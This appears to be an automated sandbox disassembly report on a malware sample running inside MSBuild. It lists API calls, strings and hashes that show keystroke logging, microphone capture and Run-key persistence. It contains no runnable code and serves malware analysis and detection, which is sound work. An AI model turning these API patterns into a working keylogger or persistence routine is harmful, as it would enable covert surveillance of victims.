                                                • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 3919263394-0
                                                • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                APIs
                                                • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MetricsSystem
                                                • String ID:
                                                • API String ID: 4116985748-0
                                                • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                APIs
                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleOpenProcess
                                                • String ID:
                                                • API String ID: 39102293-0
                                                • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountEventTick
                                                • String ID: >G
                                                • API String ID: 180926312-1296849874
                                                • Opcode ID: ed7abf5ed144e69c3d2872f5d5d6cab4558b4505d3eee695e95c0055fa3f6914
                                                • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                • Opcode Fuzzy Hash: ed7abf5ed144e69c3d2872f5d5d6cab4558b4505d3eee695e95c0055fa3f6914
                                                • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Info
                                                • String ID: $fD
                                                • API String ID: 1807457897-3092946448
                                                • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                APIs
                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ACP$OCP
                                                • API String ID: 0-711371036
                                                • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                Strings
                                                • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: KeepAlive | Enabled | Timeout:
                                                • API String ID: 481472006-1507639952
                                                • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                APIs
                                                • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: | $%02i:%02i:%02i:%03i
                                                • API String ID: 481472006-2430845779
                                                • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: alarm.wav$xIG
                                                • API String ID: 1174141254-4080756945
                                                • Opcode ID: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                • Opcode Fuzzy Hash: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                APIs
                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                • String ID: Online Keylogger Stopped
                                                • API String ID: 1623830855-1496645233
                                                • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                APIs
                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$BufferHeaderPrepare
                                                • String ID: T=G
                                                • API String ID: 2315374483-379896819
                                                • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                APIs
                                                • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocaleValid
                                                • String ID: IsValidLocaleName$j=D
                                                • API String ID: 1901932003-3128777819
                                                • Opcode ID: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                • Opcode Fuzzy Hash: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID: T=G$T=G
                                                • API String ID: 3519838083-3732185208
                                                • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                APIs
                                                • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                • String ID: [AltL]$[AltR]
                                                • API String ID: 2738857842-2658077756
                                                • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                APIs
                                                • _free.LIBCMT ref: 00448825
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorFreeHeapLast_free
                                                • String ID: `@$`@
                                                • API String ID: 1353095263-20545824
                                                • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                APIs
                                                • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: State
                                                • String ID: [CtrlL]$[CtrlR]
                                                • API String ID: 1649606143-2446555240
                                                • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteOpenValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                • API String ID: 2654517830-1051519024
                                                • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                • GetLastError.KERNEL32 ref: 0043FB02
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1717984340-0
                                                • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759